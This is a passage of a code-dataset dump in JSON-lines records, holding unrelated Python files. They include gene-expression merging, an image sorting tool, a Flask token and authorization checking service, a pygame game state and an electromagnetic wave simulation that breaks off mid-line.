new_line = line.strip()\n lines.append(new_line)\n new_file.write(new_line + \"\\n\")\n return lines\n\n\ndef reformat_xml(file_path: str, new_path: str):\n lines = []\n with open(file_path, \"r\", encoding=\"utf8\") as file, open(new_path, \"w\", encoding=\"utf8\") as new_file:\n for line in file.read().splitlines():\n if line.startswith(\"\":\n start = i + 1\n else:\n if char == \"<\":\n end = i\n break\n new_line = line[start:end].strip()\n lines.append(new_line)\n new_file.write(line + \"\\n\")\n return lines\n\n\ndef segment(lines: list, file_path: str, sp: spm.SentencePieceProcessor):\n with open(file_path, \"w\", encoding=\"utf8\") as file:\n for line in lines:\n pieces = sp.encode_as_pieces(line)\n file.write(\" \".join(pieces) + \"\\n\")\n\n\ndef write_file(file_path: str, lines: list):\n with open(file_path, 'w', encoding=\"utf8\") as file:\n for line in lines:\n file.write(line + \"\\n\")\n\n\nif len(sys.argv) == 2:\n data_path_p = sys.argv[1:]\nelse:\n data_path_p = \"D:/Datasets/de-en\"\n\npreprocess(data_path_p, hyperparameters.hp_dict)\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"574884642","text":"import pandas\nfrom functools import reduce\n\n#parameters\nfile_dir = '/data/CCBR/projects/ccbr1109/rnaseq/'\noutput_dir = '/data/CCBR/projects/ccbr1109/analysis/deg_data/'\ndate_in = '20210811'\nDEG_list = ['HNPK_SH1-SCR','HNPK_SH2-SCR','GCN1_SH2-SCR']\n\n#read in file\ndef readdf(filename):\n data=pandas.read_csv(filename,sep=\"\\t\",header=0,usecols=[\"ensid_gene\",\"fc\",\"fdr\",\"gsea_ranking_score\"])\n new = data[\"ensid_gene\"].str.split(\"|\", n = 0, expand = True)\n data['ensid']=new[0]\n data.drop(columns=['ensid_gene'],inplace=True)\n data=data[[\"ensid\",\"fc\",\"fdr\",\"gsea_ranking_score\"]]\n return data\n\n#create df with fc and fdr only\ndef merge_fc(type_in):\n flag=1\n\n for comps in DEG_list:\n tmp = readdf(file_dir + \"DEG_\" + comps + \"_1_1/\" + type_in + \"_DEG_\" + comps + \"_all_genes.txt\")\n tmp.drop(columns=['gsea_ranking_score'],inplace=True)\n tmp.columns = [\"gene\",comps + \".fc\", comps + \".fdr\"]\n\n if flag==1:\n mergeddf = tmp\n flag=2\n else:\n #merge df's\n mergeddf=reduce(lambda a,b:pandas.merge(a,b,how=\"outer\",on=\"gene\"),[tmp,mergeddf]) \n\n #clean merge df's\n mergeddf.fillna(' ',inplace=True)\n mergeddf.drop_duplicates(inplace=True)\n mergeddf.to_csv(output_dir + \"merged_deg_fc_\" + type_in + \"_\" + date_in + \".txt\",sep=\"\\t\",index=False)\n\n#create df with fc fdr and gsea\ndef merge_gsea(type_in):\n flag = 1\n\n for comps in DEG_list:\n tmp = readdf(file_dir + \"DEG_\" + comps + \"_1_1/\" + type_in + \"_DEG_\" + comps + \"_all_genes.txt\")\n tmp.columns = [\"gene\", comps + \".fc\", comps + \".fdr\", comps + \".gsea\"]\n\n if flag==1:\n mergeddf = tmp\n flag=2\n else:\n #merge df's\n mergeddf=reduce(lambda a,b:pandas.merge(a,b,how=\"outer\",on=\"gene\"),[tmp,mergeddf]) \n\n #clean merge df's\n mergeddf.fillna(' ',inplace=True)\n mergeddf.drop_duplicates(inplace=True)\n mergeddf.to_csv(output_dir + \"merged_deg_gsea_\" + type_in + \"_\" + date_in + \".txt\",sep=\"\\t\",index=False)\n\n#generate df for deg analysis\nmerge_fc(\"DESeq2\")\nmerge_fc(\"limma\")\n \n#create gsea df\nmerge_gsea(\"DESeq2\")\nmerge_gsea(\"limma\")","sub_path":"scripts/create_merged_degs.py","file_name":"create_merged_degs.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"623597052","text":"# coding=utf-8\nimport random\n\nimport cv2\nimport numpy as np\nimport os, shutil\n\n\ndef mymovefile(srcfile, dstfile):\n if not os.path.isfile(srcfile):\n print(\"%s not exist!\" % (srcfile))\n else:\n fpath, fname = os.path.split(dstfile) # 分离文件名和路径\n if not os.path.exists(fpath):\n os.makedirs(fpath) # 创建路径\n try:\n shutil.move(srcfile, dstfile) # 移动文件\n print(\"move %s -> %s\" % (srcfile, dstfile))\n except:\n print('warning! no this file!')\n\n\ndef merge_img(images):\n l = len(images) // 3\n img_up = np.hstack(images[:l])\n img_middle = np.hstack(images[l:l * 2])\n img_down = np.hstack(images[l * 2:])\n img = np.vstack([img_up, img_middle, img_down])\n return img\n\n\ndef on_mouse(event, x, y, flags, param):\n global name_list, move_dir, merge, img_shape\n\n if event == cv2.EVENT_LBUTTONDOWN:\n l = len(name_list) // 3\n id = x // img_shape[1] + (y // img_shape[0]) * l\n cv2.putText(merge, str(id) + ':', (x - 100, y), cv2.FONT_HERSHEY_COMPLEX, 2.0, (0, 0, 255), 2)\n cv2.putText(merge, os.path.split(name_list[id])[-1], (x, y), cv2.FONT_HERSHEY_COMPLEX, 2.0, (0, 0, 255), 2)\n print(id)\n cv2.imshow('image', merge)\n mymovefile(name_list[id], move_dir)\n mymovefile(name_list[id][:-4] + '_mask.png', move_dir)\n\n\ndef batch_cls_imgs(img_path, all_l=9):\n global name_list, move_dir, merge, img_shape\n move_dir = img_path + '/点击挑选出来的/'\n\n list = os.listdir(img_path)\n img_list = []\n for i in range(0, len(list)):\n path = os.path.join(img_path, list[i])\n if os.path.isfile(path) and \\\n path.endswith('.png') is True and \\\n path.endswith('mask.png') is False and \\\n path.endswith('pred.png') is False and \\\n path.endswith('display.png') is False:\n img_list.append(i)\n\n img_list = sorted(img_list)\n print(img_list)\n i = 0\n while True:\n temp_list = []\n name_list = []\n for j in range(all_l):\n image_path = os.path.join(img_path, list[img_list[i]])\n image = cv2.imread(image_path)\n if image is None:\n image = np.zeros(img_shape, dtype=np.uint8)\n img_shape = image.shape\n temp_list.append(image)\n name_list.append(image_path)\n i += 1\n print(i)\n\n merge = merge_img(temp_list)\n\n cv2.namedWindow('image', 0)\n cv2.setMouseCallback('image', on_mouse)\n cv2.imshow('image', merge)\n\n key = chr(cv2.waitKeyEx(0) & 255)\n\n if key in ['z', 'Z']:\n i = i - all_l * 2\n\n\nif __name__ == '__main__':\n # 将文件分为ok和ng\n # cls_good_ng()\n # 批量分类\n batch_cls_imgs(img_path='/home/pi/Desktop/df1b_dataset/20191024/small_img_train/bg', all_l=21)\n","sub_path":"tools/点击分类工具.py","file_name":"点击分类工具.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"541239653","text":"# Usage: python script_eye_tracking.py \nimport multiprocessing as mp\nimport subprocess as sp\nimport random, string, math, sys, os, re, time, heapq\n\ndef analyse_text(eval_file, source_filelist, destination_filelist, idx):\n log = []\n i = 0\n for s_file, d_file in zip(source_filelist, destination_filelist):\n command = \"python \" + re.escape(eval_file) + \" \" + re.escape(s_file) + \" \" + re.escape(os.path.dirname(d_file))\n # command = \"python gibber\"\n # print(\"command:\", command)\n try:\n exec_value = os.system(command)\n if exec_value:\n print(sp.check_output(command))\n else:\n # output.put((idx + i, s_file + \": Done\"))\n log.append((idx + i, s_file + \": Done\"))\n except:\n # output.put((idx + i, s_file + \": Error\"))\n log.append((idx + i, s_file + \": Error\"))\n i = i + 1\n # print(s_file)\n return log\n\ndef k_partition(combined_filelist, k):\n source_filelist, destination_filelist, heap_filesize = [], [], []\n for i in range(k):\n heapq.heappush(heap_filesize, (0, i))\n source_filelist.append([])\n destination_filelist.append([])\n combined_filelist.sort(key=lambda detail: detail[2], reverse=True)\n for s_file, d_file, size_file in combined_filelist:\n heap_filesize_top = heapq.heappop(heap_filesize)\n source_filelist[heap_filesize_top[1]].append(s_file)\n destination_filelist[heap_filesize_top[1]].append(d_file)\n heapq.heappush(heap_filesize, (heap_filesize_top[0] + size_file, heap_filesize_top[1]))\n # print(\"heap_filesize:\", heap_filesize)\n return source_filelist, destination_filelist\n\nif __name__ == '__main__':\n start_time = time.time()\n\n output = mp.Queue()\n\n program_name = sys.argv[0]\n eval_file = \"\"\n source_directory = \"\"\n destination_directory = \"\"\n suffix = \"_analysis\"\n separater = \".\"\n extension = \"csv\"\n\n if len(sys.argv) < 2:\n print(\"No evaluating python file provided\")\n sys.exit()\n elif len(sys.argv) < 3:\n print(\"No source directory provided\")\n sys.exit()\n elif len(sys.argv) < 4:\n print(\"No destination directory provided; setting source directory as destination directory\")\n eval_file = sys.argv[1]\n source_directory = destination_directory = sys.argv[2]\n else:\n eval_file = sys.argv[1]\n source_directory = sys.argv[2]\n destination_directory = sys.argv[3]\n\n source_filelist = []\n destination_filelist = []\n combined_filelist = []\n\n # Listing all the files\n filelist = os.popen(\"find \" + re.escape(source_directory) + \" -name *sample_report\" + separater + extension).read()\n filelist = filelist.split('\\n')\n filelist = list(filter(None, filelist))\n # print(len(filelist))\n for filename in filelist:\n # print(filename)\n dir = os.path.dirname(filename)\n file = os.path.basename(filename)\n # print(dir, '/', file)\n # print(os.path.abspath(os.path.join(os.path.join(source_directory, dir), file)))\n source_file = os.path.abspath(os.path.join(dir, file))\n # print(source_file)\n # print(filename[(filename.index(source_directory) + len(source_directory)) + 1:].split(os.sep)[0])\n directory = os.path.join(destination_directory, filename[(filename.index(source_directory) + len(source_directory)) + 1:].split(os.sep)[0] + suffix)\n try:\n os.stat(directory)\n except:\n os.mkdir(directory)\n destination_file = os.path.abspath(os.path.join(directory, os.path.splitext(os.path.basename(file))[0] + suffix + separater + extension))\n # print(destination_file)\n combined_filelist.append((source_file, destination_file, os.path.getsize(source_file)))\n\n # sys.exit()\n\n # Sort all files based on the file size\n combined_filelist.sort(key=lambda filename: filename[2], reverse=True)\n\n # for s_file, d_file, filesize in combined_filelist:\n # print(s_file, d_file, filesize)\n # print(s_file, filesize)\n # print(filesize)\n # sys.exit()\n\n n = min(mp.cpu_count(), len(combined_filelist)) # # of partition to be made of filelist for optimized results\n\n # Rearranging files accordingly\n\n source_filelist, destination_filelist = k_partition(combined_filelist, n)\n\n # for i in range(n):\n # source_filelist.append(list(map(lambda x: x[0], combined_filelist[i::n])))\n # destination_filelist.append(list(map(lambda x: x[1], combined_filelist[i::n])))\n # print(i, sum(list(map(lambda x: x[2], combined_filelist[i::n]))))\n\n # print(source_filelist)\n # print(destination_filelist)\n # print('\\n\\n'.join('\\n'.join(s_list) for s_list in source_filelist))\n # print('\\n\\n'.join('\\n'.join(d_list) for d_list in destination_filelist))\n # sys.exit()\n\n # processes = [mp.Process(target = analyse_text, args = (eval_file, source_filelist[x], destination_filelist[x], x, output)) for x in range(n)]\n #\n # for p in processes:\n # p.start()\n #\n # for p in processes:\n # p.join()\n #\n # results = [output.get() for p in processes]\n # results.sort()\n # results = [r[1] for r in results]\n # print('\\n'.join(results))\n\n pool = mp.Pool(processes=n)\n output = [pool.apply_async(analyse_text, args = (eval_file, source_filelist[x], destination_filelist[x], x*math.ceil(len(source_filelist)/n),)) for x in range(n)]\n\n # output = [mp.Process(target = analyse_text, args = (eval_file, source_filelist[x*math.ceil(len(source_filelist)/n):(x+1)*math.ceil(len(source_filelist)/n)], destination_filelist[x*math.ceil(len(destination_filelist)/n):(x+1)*math.ceil(len(destination_filelist)/n)], x*math.ceil(len(source_filelist)/n),)) for x in range(n)]\n # for p in output:\n # p.start()\n # for p in output:\n # p.join()\n\n results = []\n for p in output:\n results = results + p.get()\n results.sort()\n results = [r[1] for r in results]\n print('\\n'.join(results))\n end_time = time.time()\n\n print(\"Time taken:\\t\", math.floor((end_time - start_time)/60), \"min\", math.floor((end_time - start_time)%60), \"sec\")\n","sub_path":"script_eye_tracking.py","file_name":"script_eye_tracking.py","file_ext":"py","file_size_in_byte":6286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"586917313","text":"# -*- coding: utf-8 -*-\nfrom openerp import models, fields, api\n\nclass sale_order(models.Model):\n _inherit = 'sale.order'\n \n @api.model\n def _find_sale_man_id(self,partner_shipping_id,section_id=None):\n \n if section_id is None:\n section_id = self.env.user.default_section_id.id\n \n if not partner_shipping_id or not section_id:\n return None\n \n corr_obj = self.env['res.user.zip.rel']\n exception_obj = self.env['res.partner.sale.exception']\n addr = self.env['res.partner'].browse(partner_shipping_id)\n if addr.parent_id:\n partner = addr.parent_id\n else:\n partner = addr\n \n partner_exceptions = exception_obj.search([('partner', '=', partner.id), ('department', '=', section_id)])\n if partner_exceptions:\n sale_exception = partner_exceptions[0]\n return sale_exception.user.id\n \n corr_ids = corr_obj.search([('zip_min', '<=', addr.zip), ('zip_max', '>=', addr.zip), ('department', '=',section_id)])\n if corr_ids:\n corr = corr_ids[0]\n return corr.user.id\n return None\n \n \n @api.multi\n def onchange_delivery_id(self,company_id, partner_id, partner_shipping_id, fiscal_position):\n res = super(sale_order,self).onchange_delivery_id(company_id, partner_id, partner_shipping_id, fiscal_position)\n \n res['value'].update({'user_id': self._find_sale_man_id(partner_shipping_id),\n 'section_id' : self.env.user.default_section_id.id\n })\n \n return res\n\nsale_order()\n\n","sub_path":"seller_area/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"290867124","text":"# -*- coding: utf-8 -*-\r\nclass Solution:\r\n '''\r\n Compare Version Numbers\r\n \r\n Compare two version numbers version1 and version2.\r\n If version1 > version2 return 1, if version1 < version2 return -1, otherwise return 0.\r\n \r\n You may assume that the version strings are non-empty and contain only digits and the . character.\r\n The . character does not represent a decimal point and is used to separate number sequences.\r\n For instance, 2.5 is not \"two and a half\" or \"half way to version three\", it is the fifth second-level revision of the second first-level revision.\r\n \r\n Here is an example of version numbers ordering:\r\n \r\n 0.1 < 1.1 < 1.2 < 13.37\r\n \r\n Tags:\r\n String\r\n '''\r\n\r\n # @param version1, a string\r\n # @param version2, a string\r\n # @return an integer\r\n def compareVersion(self, version1, version2):\r\n digits1 = version1.split('.')\r\n digits2 = version2.split('.')\r\n n1 = len(digits1)\r\n n2 = len(digits2)\r\n i = 0\r\n while i < max(n1, n2):\r\n if i >= n1:\r\n v1 = 0\r\n else:\r\n v1 = int(digits1[i])\r\n if i >= n2:\r\n v2 = 0\r\n else:\r\n v2 = int(digits2[i])\r\n v = v1 - v2\r\n if v < 0:\r\n return -1\r\n elif v > 0:\r\n return 1\r\n else:\r\n i += 1\r\n return 0\r\n","sub_path":"problem165.py","file_name":"problem165.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"240572459","text":"# Copyright 2018 InfAI (CC SES)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport os\nimport sys\nimport requests\nfrom flask import Flask, request, abort\nfrom flask_cors import CORS\nfrom flask_restx import Api, Resource, fields\n\napplication = Flask(\"auth-check\")\napplication.config.SWAGGER_UI_DOC_EXPANSION = 'list'\nCORS(application)\napi = Api(application, version='0.1', title='auth-check API',\n description='auth-check API')\n\n\n@api.route('/doc')\nclass Docs(Resource):\n def get(self):\n return api.__schema__\n\n\nns = api.namespace('check', description='Operations related to checking authentication and authorization')\n\ncheck_model = api.model('check', {\n 'headers': fields.String(required=True, description='json with target_uri, target_method and authorization header')\n})\n\ncheck_return = api.model('check_return', {\n 'userID': fields.String(required=False, description='user id'),\n 'roles': fields.List(fields.String(description=\"A role of the user\"))\n})\n\nerror_return = api.model('error_return', {\n 'message': fields.String(required=False, description='a error message')\n})\n\n# INIT\ntry:\n client_id = os.environ[\"client_id\"]\n client_secret = os.environ[\"client_secret\"]\n keycloak_url = os.environ[\"keycloak_url\"]\n keycloak_url = \"{url}/auth/realms/master/protocol/openid-connect/token/introspect\".format(url=keycloak_url)\n ladon_url = os.environ[\"ladon_url\"]\n ladon_url = \"{url}/access\".format(url=ladon_url)\nexcept KeyError as ke:\n print(str(ke))\n sys.exit(\"Could not initialize. Make sure environment variables are set. See missing env above/below\")\n\ntry:\n debug = os.environ[\"debug\"] == \"True\"\nexcept KeyError:\n debug = False\n\nif debug:\n print(\"debug mode: ON\")\n print(\"\\tremove environment 'debug' or set to anything else than 'True' to disable\")\nelse:\n print(\"debug mode: OFF\")\n print(\"\\tset environment 'debug' to 'True' to enable\")\n\ntry:\n dontCheckAuthorization = os.environ[\"dontCheckAuthorization\"] == \"True\"\nexcept KeyError:\n dontCheckAuthorization = False\n\nif dontCheckAuthorization:\n print(\"WARNING: Not checking authorization. Do not deploy with this settings!\")\n\n# Utility\ndef log_debug(string):\n if debug:\n print(string)\n\ndef extract_roles(result_authentication):\n return result_authentication.get(\"realm_access\").get(\"roles\")\n\n\ndef check_user_authorization(result_authentication, headers):\n action = headers.get(\"target_method\")\n resource = headers.get(\"target_uri\")\n roles = extract_roles(result_authentication)\n\n for role in roles:\n access_policy_request = {\n \"Subject\": role,\n \"Action\": action,\n \"Resource\": (\"endpoints\" + resource).replace(\"/\", \":\")\n }\n\n log_debug((\"check authorization for: \" + json.dumps(access_policy_request)))\n log_debug(\"send authorization request to: \" + ladon_url)\n response = requests.post(ladon_url, data=json.dumps(access_policy_request)).json()\n log_debug(\"authorization response: \" + str(json.dumps(response)))\n if response:\n if response.get(\"Result\"):\n return True # As long as one role is allowed\n # No role allowed -> return False\n return False\n\n\ndef check_authentication(token):\n data = {\n \"client_id\": client_id,\n \"client_secret\": client_secret,\n \"token\": token,\n \"token_type_hint\": \"access_token\"\n }\n\n try:\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\n log_debug(\"send token validation request to: \" + keycloak_url)\n response = requests.post(keycloak_url, data=data, headers=headers)\n response = response.json()\n log_debug(\"token validation response: \" + str(json.dumps(response)))\n if response.get(\"active\"):\n log_debug(\"access token is valid\")\n return response, None\n else:\n log_debug(\"access token is not valid\")\n error_message = response.get(\"error_description\")\n log_debug(error_message)\n if error_message:\n log_debug(error_message)\n return False, error_message\n else:\n return False, \"Access Token is not valid\"\n except Exception as e:\n print(str(e))\n return False, \"Access Token could not be checked\"\n\n\ndef check_client_authorization(result_authentication):\n \"\"\"\n if endpoint == \"/iot-repo\" and method == \"POST\":\n if scope != \"write:process\":\n return False\n elif endpoint == \"/process-repo\" and method == \"POST\":\n if scoe != \"write:process\":\n return False\n \"\"\"\n return None\n\n\n@ns.route('/', strict_slashes=False)\nclass Operator(Resource):\n @api.expect(check_model)\n @api.marshal_with(check_return, code=201)\n @api.response(400, 'Bad request', error_return)\n @api.response(401, 'Unauthorized, see message', error_return)\n @api.response(403, 'Forbidden, see message', error_return)\n @api.response(500, 'Internal Server Error', error_return)\n @api.response(502, 'Bad Gateway', error_return)\n def post(self):\n if request.headers.get('Content-Type') != \"application/json\":\n abort(400, \"Can only handle Content-Type: application/json\")\n else:\n payload = request.get_json()\n log_debug(\"Payload: \" + str(json.dumps(payload)))\n headers = payload.get(\"headers\")\n params = payload.get(\"uri_args\")\n method = headers.get(\"target_method\")\n authorization_header = headers.get(\"authorization\")\n log_debug(authorization_header)\n if not authorization_header:\n if isinstance(params, dict):\n authorization_header = params.get(\"token\")\n log_debug(authorization_header)\n\n if method == \"OPTIONS\":\n log_debug(\"OPTIONS request is allowed\")\n # TODO: check in middleman if user id ist da\n # sollte eigentlich nicht mit gesendet werden\n payload = json.dumps({\"userID\": \"\"})\n return payload, 200\n\n else:\n if authorization_header:\n token = authorization_header.split(\" \")[-1]\n\n result_authentication, error_authentication = check_authentication(token)\n\n if result_authentication:\n log_debug(\"authentication was successful\")\n try:\n if not dontCheckAuthorization:\n result_authorization = check_user_authorization(result_authentication, headers)\n else:\n result_authorization = True\n except Exception as e:\n print(str(e))\n abort(502, \"Authorization could not be checked\")\n\n if result_authorization:\n result_client_authorization = check_client_authorization(result_authentication)\n log_debug(\"authorization was successful\")\n roles = extract_roles(result_authentication)\n log_debug(\"roles: \" + str(roles))\n payload = {\"userID\": result_authentication.get(\"sub\"), \"roles\": roles}\n return payload, 200\n else:\n abort(403, \"missing authorization\")\n else:\n if error_authentication == \"Access Token could not be checked\":\n abort(502, error_authentication)\n abort(401, error_authentication)\n else:\n log_debug(\"missing access token -> unauthorized\")\n abort(401, \"missing access token\")\n\n\nif __name__ == \"__main__\":\n application.run(\"0.0.0.0\", os.getenv('PORT', 5000), debug=False)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"420227152","text":"\"\"\"\nType stubs for pytest.\nNote that stubs are only written for the parts that we use.\n\"\"\"\n\nfrom typing import Any, ContextManager, Optional, Pattern, Tuple, Type, TypeVar, Union\n\nfrom _pytest._code import ExceptionInfo\n\n_E = TypeVar(\"_E\", bound=BaseException)\n\ndef raises(\n expected_exception: Union[\"Type[_E]\", Tuple[\"Type[_E]\", ...]],\n *args: Any,\n match: Optional[Union[str, Pattern[Any]]] = None,\n **kwargs: Any\n) -> ContextManager[Optional[ExceptionInfo]]: ...\n","sub_path":"stubs/pytest.pyi","file_name":"pytest.pyi","file_ext":"pyi","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"357256094","text":"import pygame\n\nfrom core.statemachine import AbstractState\n\n\nfrom core.UI import TextOptionsUIPanel, TextPanel, TextUIOption\n\n\nclass LevelCompleteState(AbstractState):\n def __init__(self, state_machine):\n super().__init__(state_machine)\n self.complete_options_panel = None\n self.complete_text_panel = None\n self.complete_score_panel = None\n self.current_save = None\n self.current_level = None\n self.steps = None\n self.surf = None\n self.background_surf = None\n self.options = []\n self.save_manager = None\n\n def enter(self, persisted_data, current_time):\n super().enter(persisted_data, current_time)\n self.current_save = self.data_to_persist[\"save_data\"]\n self.steps = self.data_to_persist[\"steps\"]\n self.current_level = self.data_to_persist[\"level_data\"]\n self.best_steps = self.current_save.get_best_score_for_level(\n self.current_level.level_number\n )\n self.options = [\n TextUIOption(\"Next\", 0, self._continue),\n TextUIOption(\"Retry\", 1, self._retry),\n ]\n self.background_surf = self.data_to_persist[\"surfaces\"]\n\n best_string = \"\"\n\n if self.best_steps is not None:\n best_string = \"Best-{}\".format(self.best_steps)\n\n self.complete_text_panel = TextPanel(\"Level Complete!\")\n self.complete_score_panel = TextPanel(\n \"Steps-{} {}\".format(self.steps, best_string),\n self.complete_text_panel.get_size(),\n screen_position=pygame.Vector2(0, self.complete_text_panel.get_size().y),\n )\n\n self.complete_options_panel = TextOptionsUIPanel(\n pygame.Vector2(self.complete_text_panel.get_size().x, 35),\n self.options,\n screen_position=pygame.Vector2(\n 0,\n self.complete_text_panel.get_size().y\n + self.complete_score_panel.get_size().y,\n ),\n )\n\n size = pygame.Vector2(\n x=max(\n self.complete_options_panel.get_size().x,\n self.complete_score_panel.get_size().x,\n self.complete_text_panel.get_size().x,\n ),\n y=self.complete_options_panel.get_size().y\n + self.complete_score_panel.get_size().y\n + self.complete_text_panel.get_size().y,\n )\n self.surf = pygame.Surface(size)\n # self._save()\n\n def _continue(self):\n self._save()\n self.data_to_persist[\"level_to_load\"] = self.current_save.get_next_level()\n self.data_to_persist[\"current_player\"] = self.current_save\n self.state_machine.change_state(\"GAME\")\n\n def _save(self):\n self.current_save.upsert_level_data(\n self.current_level.level_name,\n self.current_level.level_number,\n self.steps,\n )\n self.state_machine.get_data(\"SAVE_MANAGER\").save()\n\n def _retry(self):\n self._save()\n self.data_to_persist[\"level_to_load\"] = self.current_level.level_number\n self.data_to_persist[\"current_player\"] = self.current_save\n self.state_machine.change_state(\"GAME\")\n\n def update(self, current_time):\n super().update(current_time)\n self._build_surfaces()\n\n def handle_events(self, events):\n super().handle_events(events)\n for event in events:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n self.complete_options_panel.previous_option()\n if event.key == pygame.K_DOWN:\n self.complete_options_panel.next_option()\n if event.key == pygame.K_RETURN:\n self.complete_options_panel.current_option.select()\n\n def _build_surfaces(self):\n self.surfaces = []\n self.surfaces.append({\"surface\": self.background_surf, \"position\": None})\n self.surf.blit(\n self.complete_options_panel.surf,\n self.complete_options_panel.screen_position,\n )\n self.surf.blit(\n self.complete_text_panel.surf, self.complete_text_panel.screen_position\n )\n self.surf.blit(\n self.complete_score_panel.surf, self.complete_score_panel.screen_position\n )\n self.surfaces.append({\"surface\": self.surf, \"position\": None})\n","sub_path":"states/LevelCompleteState.py","file_name":"LevelCompleteState.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"445883723","text":"import numpy as np\nimport scipy.special\nimport cmath\nimport math\n\nimport multiprocessing as mp\n\n\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\n\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\nfrom mpl_toolkits.mplot3d import proj3d\nfrom matplotlib.animation import FuncAnimation\nfrom scipy.sparse.linalg import eigsh\nfrom scipy import sparse\nfrom sparse_dot_mkl import dot_product_mkl\n\n\n\n\n\ngrid_size = (200, 200)\nlight_speed = 3 * 10**8 # can change smoothness of surface and cause the wave really move and inital wave is normal\nelectric_constant = 8.854 * 10**(-12)\nmagnetic_constant = 1.256 * 10**(-6)\n# light_speed = 1 # can change smoothness of surface\n# electric_constant = 1\n# magnetic_constant = 1\nmesh_step = 0.1 # can change number of summits. 0.1 is good\nnum_of_frames = 75\ntime_step = 0.00000000004\nelectric_direction = np.array((0, 1, 0))\nk = np.array((1, 0, 0))\nE_0 = 10\nallowed_error = 10**(-13)\nmax_order_of_chebyshev_poly = 100000\ndisplay_size_step = 2\n\n\nfree_plane = np.array([-grid_size[0] / 2, -grid_size[1] / 2, grid_size[0] / 2, grid_size[1] /2]) * mesh_step\nfree_plane_length = (grid_size[0] * mesh_step, grid_size[1] * mesh_step)\npacket_center = (0, 0)\npacket_size = (0.06875 * free_plane_length[0], 0.05 * free_plane_length[1], 0.05 * free_plane_length[1])\noperator_size = (grid_size[0] + 1) * (grid_size[1] + 1) * 3\n\nelectric_coeff_sqrt = math.sqrt(electric_constant)\nmagnetic_coeff_sqrt = math.sqrt(magnetic_constant)\n\n\nelectric_direction = electric_direction / np.linalg.norm(electric_direction)\nk_direction = k / np.linalg.norm(k)\n\ndef E(x, y, z):\n return np.array([-electric_direction[1] * y / 2 / packet_size[1]**2 - electric_direction[2] * z / 2 / packet_size[2], -electric_direction[1] * (-x / 2 / packet_size[0]**2 + k[0] * 1j), -electric_direction[2] * (-x / 2 / packet_size[0]**2 + k[0] * 1j)]) * 1j * E_0 * math.pi**(3/2) / (packet_size[0] * packet_size[1] * packet_size[2]) * cmath.exp(1j * k[0] * x) * cmath.exp(-(x/2/packet_size[0])**2-(y/2/packet_size[1])**2-(z/2/packet_size[2])**2)\n\n\ndef B(x, y, z):\n return np.cross(k_direction, E(x, y, z)) / light_speed\n\n\n\ndef get_discretized_init_wave_function():\n xs = np.linspace(free_plane[0], free_plane[2], grid_size[0] + 1)\n ys = np.linspace(free_plane[1], free_plane[3], grid_size[1] + 1)\n es = np.empty((operator_size))\n i = 0\n for y in ys:\n for x in xs:\n curr_E = E(x, y, 0)\n curr_B = np.cross(k_direction, curr_E) / light_speed\n curr_Y = [x.real * electric_coeff_sqrt for x in curr_E]\n curr_X = [x.real / magnetic_coeff_sqrt for x in curr_B]\n es[i * 3] = curr_Y[0]\n es[i * 3 + 1] = curr_Y[1]\n es[i * 3 + 2] = curr_X[2]\n i += 1\n return es\n\n\n\n\ndef flatten_hamiltionian(i, j):\n rows = [np.zeros((grid_size[1] + 1, grid_size[0] + 1, 3)) for m in range(3)]\n if j + 1 <= grid_size[1]:\n rows[0][j + 1][i][2] = 1\n if j - 1 >= 0:\n rows[0][j - 1][i][2] = -1\n rows[0] /= electric_coeff_sqrt * magnetic_coeff_sqrt * 2 * mesh_step\n\n if i + 1 <= grid_size[0]:\n rows[1][j][i + 1][2] = -1\n if i - 1 >= 0:\n rows[1][j][i - 1][2] = 1\n rows[1] /= electric_coeff_sqrt * magnetic_coeff_sqrt * 2 * mesh_step\n\n if j + 1 <= grid_size[1]:\n rows[2][j + 1][i][0] = 1\n if j - 1 >= 0:\n rows[2][j - 1][i][0] = -1\n if i + 1 <= grid_size[0]:\n rows[2][j][i + 1][1] = -1\n if i - 1 >= 0:\n rows[2][j][i - 1][1] = 1\n rows[2] /= electric_coeff_sqrt * magnetic_coeff_sqrt * 2 * mesh_step\n\n return sparse.vstack([sparse.csr_matrix(row.flatten()) for row in rows])\n\ndef flatten_hamiltionian_row(j):\n h_rows = [flatten_hamiltionian(i, j) for i in range(grid_size[0] + 1)]\n return sparse.vstack(h_rows)\n\ndef get_hamiltonian():\n pool = mp.Pool(mp.cpu_count())\n hamiltonian = pool.map(flatten_hamiltionian_row, range(grid_size[1] + 1))\n # for j in range(grid_size[1] + 1):\n # for i in range(grid_size[0] + 1):\n # hamiltonian.append(flatten_hamiltionian(i, j))\n # print(j)\n pool.close()\n return sparse.vstack(hamiltonian)\n\n\nT_tilde_matrices = [None, 